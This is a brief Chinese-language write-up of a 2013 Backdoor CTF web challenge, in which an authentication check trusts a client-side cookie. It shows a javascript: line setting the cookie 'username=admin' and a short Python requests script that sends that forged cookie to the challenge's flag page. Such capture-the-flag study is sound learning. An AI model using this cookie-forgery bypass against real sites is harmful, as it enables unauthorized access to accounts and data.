Backdoor CTF 2013 Web 50

backdoor ctf 2013, ctf, web

0x00 题目

H4x0r,一天早上,为自己的网站搞了一个身份验证系统。他很自然觉得自己搞了一个先进高端的系统,然而我们是知道他是多么”出色的”。成为管理员非常容易,你可以访问这个链接的轻松获取flag。

0x01 解题

姿势一:

1
javascript:document.cookie="username=admin"

Backdoor-CTF-2013-WEB-50_javascript.gif

Backdoor-CTF-2013-WEB-50_javascript_2.gif

姿势二:

1
2
3
4
5
6
7
8
9
10
import requests
def main():
    url = "http://hack.bckdr.in/2013-WEB-50/getflag.php"
    cookie = {"username": "admin"}
    req = requests.get(url, cookies=cookie)
    print(req.text)
if __name__ == "__main__":
    main()

姿势三:

Backdoor-CTF-2013-WEB-50_1.gif

Backdoor-CTF-2013-WEB-50_2.gif

Backdoor-CTF-2013-WEB-50_3.gif